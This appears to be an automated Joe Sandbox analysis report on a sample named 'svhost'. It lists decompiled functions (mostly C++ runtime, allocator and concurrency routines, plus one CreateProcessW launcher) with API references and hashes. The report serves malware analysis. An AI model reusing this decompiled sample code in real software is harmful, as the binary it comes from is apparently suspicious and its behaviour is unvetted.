                                      0x00e52eae
                                      0x00e52eae
                                      0x00e52eb7
                                      0x00e52eb9
                                      0x00e52ebe
                                      0x00e52ebe
                                      0x00e52ec6
                                      0x00e52edb

                                      APIs
                                      • Concurrency::details::_CancellationTokenState::_IsCanceled.LIBCONCRTD ref: 00E52E60
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E52E76
                                      • Concurrency::details::_CancellationTokenState::_IsCanceled.LIBCONCRTD ref: 00E52E85
                                      • Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back.LIBCONCRTD ref: 00E52E9F
                                        • Part of subcall function 00E52C70: Concurrency::details::SweeperContext::SweeperContext.LIBCMTD ref: 00E52CB9
                                      • SafeRWList.LIBCONCRTD ref: 00E52EAE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_Token$Cancellation$CanceledState::_Sweeper$Concurrency::details::Container::push_backContextContext::CriticalListLock::_ReentrantRegistrationSafeScoped_lockScoped_lock::_State::
                                      • String ID:
                                      • API String ID: 1150526973-0
                                      • Opcode ID: d2f10eb91f724489d7c330d0a5882bf8c903917665950eebbf80057622f8851c
                                      • Instruction ID: 52e927a1d967b8a19d34d9fe8f52d7f65c4cf43559cbdf16f34de116f4f2b7ea
                                      • Opcode Fuzzy Hash: d2f10eb91f724489d7c330d0a5882bf8c903917665950eebbf80057622f8851c
                                      • Instruction Fuzzy Hash: 1F217F70D041099BCB08EF94D852BBFBBB1EF45301F00951DE9127B2C2DB749908CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6E9A0 Relevance: 7.6, APIs: 5, Instructions: 59processsynchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E6E9A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				intOrPtr _v96;
				signed int _t16;
				void* _t31;
				void* _t42;
				signed int _t43;

				_t42 = __esi;
				_t41 = __edi;
				_t31 = __ebx;
				_t16 =  *0xeef074; // 0x221cac15
				_v8 = _t16 ^ _t43;
				_v96 = __ecx;
				if((E00E579A0(_a4) & 0x000000ff) == 0) {
					E00EA1270(__edi,  &_v76, 0, 0x44);
					_t40 = 0;
					_v92.hProcess = 0;
					_v92.hThread = 0;
					_v92.dwProcessId = 0;
					_v92.dwThreadId = 0;
					if(CreateProcessW(0, E00E57A40(), 0, 0, 1, 0x8000000, 0, 0,  &_v76,  &_v92) == 0) {
						goto L3;
					} else {
						_t40 = _v92.hProcess;
						WaitForSingleObject(_v92.hProcess, 0xffffffff);
						CloseHandle(_v92.hThread);
						CloseHandle(_v92);
					}
				}
				return E00E89A35(_t31, _v8 ^ _t43, _t40, _t41, _t42);
			}











                                      0x00e6e9a0
                                      0x00e6e9a0
                                      0x00e6e9a0
                                      0x00e6e9a6
                                      0x00e6e9ad
                                      0x00e6e9b0
                                      0x00e6e9c0
                                      0x00e6e9ca
                                      0x00e6e9d2
                                      0x00e6e9d4
                                      0x00e6e9d7
                                      0x00e6e9da
                                      0x00e6e9dd
                                      0x00e6ea0a
                                      0x00000000
                                      0x00e6ea0c
                                      0x00e6ea0e
                                      0x00e6ea12
                                      0x00e6ea1c
                                      0x00e6ea26
                                      0x00e6ea2c
                                      0x00e6ea0a
                                      0x00e6ea3f

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6E9B6
                                      • CreateProcessW.KERNEL32 ref: 00E6EA02
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E6EA12
                                      • CloseHandle.KERNEL32(?), ref: 00E6EA1C
                                      • CloseHandle.KERNEL32(?), ref: 00E6EA26
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateObjectProcessSingleWaitstd::ios_base::good
                                      • String ID:
                                      • API String ID: 1339197284-0
                                      • Opcode ID: b7854c6b4091f02e4b7cca735b3053e1ea33ee39c49c0e8a545d04bfcbf61d76
                                      • Instruction ID: 7ac7ddc7e4b1366eb831b832fbe4d9bb5b7314b9acba289023ee854140843bdb
                                      • Opcode Fuzzy Hash: b7854c6b4091f02e4b7cca735b3053e1ea33ee39c49c0e8a545d04bfcbf61d76
                                      • Instruction Fuzzy Hash: D81182B5A40208AFDB14EFE5DC42FDEBBB4AF54700F104129F60ABB2D0EA71A5098B55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E56D20 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00E56D20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v44;
				signed int _t22;
				intOrPtr _t27;
				void* _t31;
				void* _t32;
				signed int _t53;
				void* _t54;
				intOrPtr _t56;
				void* _t57;

				_push(0xffffffff);
				_push(0xec0528);
				_push( *[fs:0x0]);
				_t22 =  *0xeef074; // 0x221cac15
				 *[fs:0x0] =  &_v16;
				_v20 = __ecx;
				_v8 = 0;
				_t56 = _t54 - 0x10;
				_v32 = _t56;
				E00E53610(_t56,  &_a8);
				_t27 = E00E58820(__ebx, __edi, __esi, __eflags,  &_v44, _a4, _t22 ^ _t53);
				_t57 = _t56 + 0x14;
				_v24 = _t27;
				_v28 = _v24;
				E00E58700(_v20, __eflags, _v28);
				E00E56EC0();
				_t31 = E00E52DD0();
				_t60 = _a4 - _t31;
				if(_a4 != _t31) {
					_v36 = _t57 - 8;
					E00E572A0(_v20);
					E00E543E0(__ebx, E00E5A440(_v20), _v20, __edi, __esi, _t60);
				}
				_v8 = 0xffffffff;
				_t32 = E00E535F0( &_a8);
				 *[fs:0x0] = _v16;
				return _t32;
			}



















                                      0x00e56d23
                                      0x00e56d25
                                      0x00e56d30
                                      0x00e56d34
                                      0x00e56d3f
                                      0x00e56d45
                                      0x00e56d48
                                      0x00e56d4f
                                      0x00e56d54
                                      0x00e56d5b
                                      0x00e56d68
                                      0x00e56d6d
                                      0x00e56d70
                                      0x00e56d76
                                      0x00e56d80
                                      0x00e56d88
                                      0x00e56d8d
                                      0x00e56d92
                                      0x00e56d95
                                      0x00e56d9c
                                      0x00e56da3
                                      0x00e56db2
                                      0x00e56db2
                                      0x00e56db7
                                      0x00e56dc1
                                      0x00e56dc9
                                      0x00e56dd4

                                      APIs
                                      • Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E56D5B
                                        • Part of subcall function 00E53610: shared_ptr.LIBCPMTD ref: 00E5361E
                                      • _Task_ptr.LIBCPMTD ref: 00E56D68
                                      • shared_ptr.LIBCMTD ref: 00E56D80
                                        • Part of subcall function 00E58700: shared_ptr.LIBCPMTD ref: 00E5871D
                                        • Part of subcall function 00E58700: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E5872C
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E56D88
                                        • Part of subcall function 00E56EC0: _Ptr_base.LIBCMTD ref: 00E56EE9
                                      • shared_ptr.LIBCPMTD ref: 00E56DA3
                                        • Part of subcall function 00E572A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00E572C9
                                        • Part of subcall function 00E572A0: _Copy_construct_from.LIBCPMTD ref: 00E572D5
                                        • Part of subcall function 00E543E0: _DebugHeapAllocator.LIBCPMTD ref: 00E54423
                                        • Part of subcall function 00E543E0: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E544A0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: shared_ptrstd::_$Container_base12Container_base12::~_$AllocatorConcurrency::scheduler_ptr::scheduler_ptrCopy_construct_fromDebugHeapIterator_baseIterator_base::_Ptr_baseTask_ptr
                                      • String ID:
                                      • API String ID: 961000812-0
                                      • Opcode ID: 67ffad096323bfa26d19e500674499844409eeee3defe42aae6ba993036ab19e
                                      • Instruction ID: 213f97bdb201e72204ffb5f42dff99723365f21613d10897b87da26b958bbadf
                                      • Opcode Fuzzy Hash: 67ffad096323bfa26d19e500674499844409eeee3defe42aae6ba993036ab19e
                                      • Instruction Fuzzy Hash: 691151B5D00209DBCB04EFA4D942AEEBBF5EB48711F505A2DF815B7281EB345A08CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB7CF0 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB7CF0(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xeef250; // 0xeef2a4
					if(_t23 != 0) {
						E00EB051F(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xeef254; // 0xef350c
					if(_t24 != 0) {
						E00EB051F(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xeef258; // 0xef350c
					if(_t25 != 0) {
						E00EB051F(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xeef280; // 0xeef2a8
					if(_t26 != 0) {
						E00EB051F(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xeef284; // 0xef3510
					if(_t27 != 0) {
						return E00EB051F(_t6);
					}
				}
				return _t6;
			}










                                      0x00eb7cf6
                                      0x00eb7cfb
                                      0x00eb7cff
                                      0x00eb7d05
                                      0x00eb7d08
                                      0x00eb7d0d
                                      0x00eb7d11
                                      0x00eb7d17
                                      0x00eb7d1a
                                      0x00eb7d1f
                                      0x00eb7d23
                                      0x00eb7d29
                                      0x00eb7d2c
                                      0x00eb7d31
                                      0x00eb7d35
                                      0x00eb7d3b
                                      0x00eb7d3e
                                      0x00eb7d43
                                      0x00eb7d44
                                      0x00eb7d47
                                      0x00eb7d4d
                                      0x00000000
                                      0x00eb7d55
                                      0x00eb7d4d
                                      0x00eb7d58

                                      APIs
                                      • _free.LIBCMT ref: 00EB7D08
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      • _free.LIBCMT ref: 00EB7D1A
                                      • _free.LIBCMT ref: 00EB7D2C
                                      • _free.LIBCMT ref: 00EB7D3E
                                      • _free.LIBCMT ref: 00EB7D50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b84e0571d2ab73736979fe4e923ceda1cfa9eca0b37602a4955d36a6dc58bc1f
                                      • Instruction ID: 5adce7cbc3a93a4372bf05c6ea0d80bb71f4897ec07210d253a19b17c1a606b1
                                      • Opcode Fuzzy Hash: b84e0571d2ab73736979fe4e923ceda1cfa9eca0b37602a4955d36a6dc58bc1f
                                      • Instruction Fuzzy Hash: B3F06232509648AFC630EB65E9C5CAB73DAAF897543643815F248FBD20C730FD804B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E64C70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00E64C70(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				signed int _t65;
				void* _t69;
				void* _t87;
				signed int _t140;

				_t139 = __esi;
				_t138 = __edi;
				_t99 = __ebx;
				_t65 =  *0xeef074; // 0x221cac15
				_v8 = _t65 ^ _t140;
				_v20 = __ecx;
				_v16 = E00E51100(_v20);
				_v24 =  *((intOrPtr*)(_v16 + 0x10));
				_t69 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags);
				_t147 = _t69 - _v24 - _a4;
				if(_t69 - _v24 < _a4) {
					E00E5BFD0();
				}
				_v32 = _v24 + _a4;
				_v40 =  *((intOrPtr*)(_v16 + 0x14));
				_v36 = E00E5C0F0(_t99, _v20, _v32, _t138, _t139, _t147, _v32);
				_v28 = E00E56580(_v20);
				_v12 = E00E59B70(_v28, _t147,  ~(0 | _t147 > 0x00000000) | _v36 + 0x00000001);
				E00E516F0(_t78, _v16);
				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 0x10) {
					E00E64070( &_a8, _v48, _v16, _v24, _a12, _a16, _a20, _a24);
					_t87 = E00E51650(_v16);
					_t134 = _v28;
					E00E5B410(_v16, _v28, _t87,  &_v12);
				} else {
					asm("lfence");
					_v44 =  *_v16;
					_t44 =  &_v44; // 0xe64062
					E00E64070( &_a8, _v48, E00E51650( *_t44), _v24, _a12, _a16, _a20, _a24);
					_t48 =  &_v44; // 0xe64062
					_t134 =  *_t48;
					E00E59BA0(_v28,  *_t48, _v40 + 1);
					 *_v16 = _v12;
				}
				return E00E89A35(_t99, _v8 ^ _t140, _t134, _t138, _t139);
			}


















                                      0x00e64c70
                                      0x00e64c70
                                      0x00e64c70
                                      0x00e64c76
                                      0x00e64c7d
                                      0x00e64c80
                                      0x00e64c8b
                                      0x00e64c94
                                      0x00e64c9a
                                      0x00e64ca2
                                      0x00e64ca5
                                      0x00e64ca7
                                      0x00e64ca7
                                      0x00e64cb2
                                      0x00e64cbb
                                      0x00e64cca
                                      0x00e64cd5
                                      0x00e64cf0
                                      0x00e64cf6
                                      0x00e64d01
                                      0x00e64d0a
                                      0x00e64d19
                                      0x00e64d20
                                      0x00e64d96
                                      0x00e64da3
                                      0x00e64dac
                                      0x00e64db0
                                      0x00e64d22
                                      0x00e64d22
                                      0x00e64d2a
                                      0x00e64d41
                                      0x00e64d55
                                      0x00e64d61
                                      0x00e64d61
                                      0x00e64d68
                                      0x00e64d73
                                      0x00e64d73
                                      0x00e64dc8

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E64CEB
                                      • allocator.LIBCONCRTD ref: 00E64D68
                                      • construct.LIBCPMTD ref: 00E64DB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: b@
                                      • API String ID: 3172100163-3405210070
                                      • Opcode ID: 8a96d02773b1f6527ef613b9a60ad3db25e99acde5aff12114e025d116a37bae
                                      • Instruction ID: fdd93ebf82b6f2104a18d59220004639c48025be0713e8c864e4c54f8f4c6c54
                                      • Opcode Fuzzy Hash: 8a96d02773b1f6527ef613b9a60ad3db25e99acde5aff12114e025d116a37bae
                                      • Instruction Fuzzy Hash: 8051C3B5E00109AFCB48DFA8D8919EFB7F5EF8C300B108559E919B7351DB30AA45CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E64AA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00E64AA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t63;
				void* _t67;
				signed int _t136;

				_t135 = __esi;
				_t134 = __edi;
				_t98 = __ebx;
				_t63 =  *0xeef074; // 0x221cac15
				_v8 = _t63 ^ _t136;
				_v20 = __ecx;
				_v16 = E00E51100(_v20);
				_v24 =  *((intOrPtr*)(_v16 + 0x10));
				_t67 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags);
				_t143 = _t67 - _v24 - _a4;
				if(_t67 - _v24 < _a4) {
					E00E5BFD0();
				}
				_v32 = _v24 + _a4;
				_v40 =  *((intOrPtr*)(_v16 + 0x14));
				_t17 =  &_v32; // 0xe6363e
				_v36 = E00E5C0F0(_t98, _v20,  *_t17, _t134, _t135, _t143,  *_t17);
				_v28 = E00E56580(_v20);
				_v12 = E00E59B70(_v28, _t143,  ~(0 | _t143 > 0x00000000) | _v36 + 0x00000001);
				E00E516F0(_t76, _v16);
				_t29 =  &_v32; // 0xe6363e
				 *((intOrPtr*)(_v16 + 0x10)) =  *_t29;
				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 0x10) {
					E00E63650( &_a8, _v48, _v16, _v24, _a12, _a16, _a20);
					_t130 = _v16;
					E00E5B410( &_v12, _v28, E00E51650(_v16),  &_v12);
				} else {
					asm("lfence");
					_v44 =  *_v16;
					E00E63650( &_a8, _v48, E00E51650(_v44), _v24, _a12, _a16, _a20);
					E00E59BA0(_v28, _v44, _v40 + 1);
					_t130 = _v16;
					 *_v16 = _v12;
				}
				return E00E89A35(_t98, _v8 ^ _t136, _t130, _t134, _t135);
			}

















                                      0x00e64aa0
                                      0x00e64aa0
                                      0x00e64aa0
                                      0x00e64aa6
                                      0x00e64aad
                                      0x00e64ab0
                                      0x00e64abb
                                      0x00e64ac4
                                      0x00e64aca
                                      0x00e64ad2
                                      0x00e64ad5
                                      0x00e64ad7
                                      0x00e64ad7
                                      0x00e64ae2
                                      0x00e64aeb
                                      0x00e64aee
                                      0x00e64afa
                                      0x00e64b05
                                      0x00e64b20
                                      0x00e64b26
                                      0x00e64b2e
                                      0x00e64b31
                                      0x00e64b3a
                                      0x00e64b49
                                      0x00e64b50
                                      0x00e64bbe
                                      0x00e64bc7
                                      0x00e64bd8
                                      0x00e64b52
                                      0x00e64b52
                                      0x00e64b5a
                                      0x00e64b81
                                      0x00e64b94
                                      0x00e64b99
                                      0x00e64b9f
                                      0x00e64b9f
                                      0x00e64bf0

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E64B1B
                                      • allocator.LIBCONCRTD ref: 00E64B94
                                      • construct.LIBCPMTD ref: 00E64BD8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: >6
                                      • API String ID: 3172100163-2034285660
                                      • Opcode ID: 2cd0136e981d360e12e13357cbe9a04155b1c121ff7f90afa9115a3721a5aa26
                                      • Instruction ID: 670a70ce725432307442bf474a4501b9d5b3541504e1f7152c3debc084b6ac47
                                      • Opcode Fuzzy Hash: 2cd0136e981d360e12e13357cbe9a04155b1c121ff7f90afa9115a3721a5aa26
                                      • Instruction Fuzzy Hash: FE41A4B5E00109AFCB08DFA8D8919EEB7F5EF88340B109559E919B7351DB30AA45CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6E5D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00E6E5D0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t63;
				void* _t67;
				signed int _t136;

				_t135 = __esi;
				_t134 = __edi;
				_t98 = __ebx;
				_t63 =  *0xeef074; // 0x221cac15
				_v8 = _t63 ^ _t136;
				_v20 = __ecx;
				_v16 = E00E51100(_v20);
				_v24 =  *((intOrPtr*)(_v16 + 0x10));
				_t67 = E00E59FC0(__ebx, _v20, __edi, __esi);
				_t143 = _t67 - _v24 - _a4;
				if(_t67 - _v24 < _a4) {
					E00E5BFD0();
				}
				_v32 = _v24 + _a4;
				_v40 =  *((intOrPtr*)(_v16 + 0x14));
				_t17 =  &_v32; // 0xe6e435
				_v36 = E00E5BFE0(_t98, _v20,  *_t17, _t134, _t135, _t143,  *_t17);
				_v28 = E00E56580(_v20);
				_v12 = E00E5A120(_v28,  ~(0 | _t143 > 0x00000000) | _v36 + 0x00000001);
				E00E516F0(_t76, _v16);
				_t29 =  &_v32; // 0xe6e435
				 *((intOrPtr*)(_v16 + 0x10)) =  *_t29;
				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 8) {
					E00E6E440( &_a8, _v48, _v16, _v24, _a12, _a16, _a20);
					_t130 = _v16;
					E00E5B410( &_v12, _v28, E00E51650(_v16),  &_v12);
				} else {
					asm("lfence");
					_v44 =  *_v16;
					E00E6E440( &_a8, _v48, E00E51650(_v44), _v24, _a12, _a16, _a20);
					E00E5A150(_v28, _v44, _v40 + 1);
					_t130 = _v16;
					 *_v16 = _v12;
				}
				return E00E89A35(_t98, _v8 ^ _t136, _t130, _t134, _t135);
			}

















                                      0x00e6e5d0
                                      0x00e6e5d0
                                      0x00e6e5d0
                                      0x00e6e5d6
                                      0x00e6e5dd
                                      0x00e6e5e0
                                      0x00e6e5eb
                                      0x00e6e5f4
                                      0x00e6e5fa
                                      0x00e6e602
                                      0x00e6e605
                                      0x00e6e607
                                      0x00e6e607
                                      0x00e6e612
                                      0x00e6e61b
                                      0x00e6e61e
                                      0x00e6e62a
                                      0x00e6e635
                                      0x00e6e650
                                      0x00e6e656
                                      0x00e6e65e
                                      0x00e6e661
                                      0x00e6e66a
                                      0x00e6e679
                                      0x00e6e680
                                      0x00e6e6ee
                                      0x00e6e6f7
                                      0x00e6e708
                                      0x00e6e682
                                      0x00e6e682
                                      0x00e6e68a
                                      0x00e6e6b1
                                      0x00e6e6c4
                                      0x00e6e6c9
                                      0x00e6e6cf
                                      0x00e6e6cf
                                      0x00e6e720

                                      APIs
                                        • Part of subcall function 00E59FC0: _Max_value.LIBCPMTD ref: 00E59FF6
                                        • Part of subcall function 00E59FC0: _Min_value.LIBCPMTD ref: 00E5A01C
                                      • allocator.LIBCONCRTD ref: 00E6E64B
                                      • allocator.LIBCPMTD ref: 00E6E6C4
                                      • construct.LIBCPMTD ref: 00E6E708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
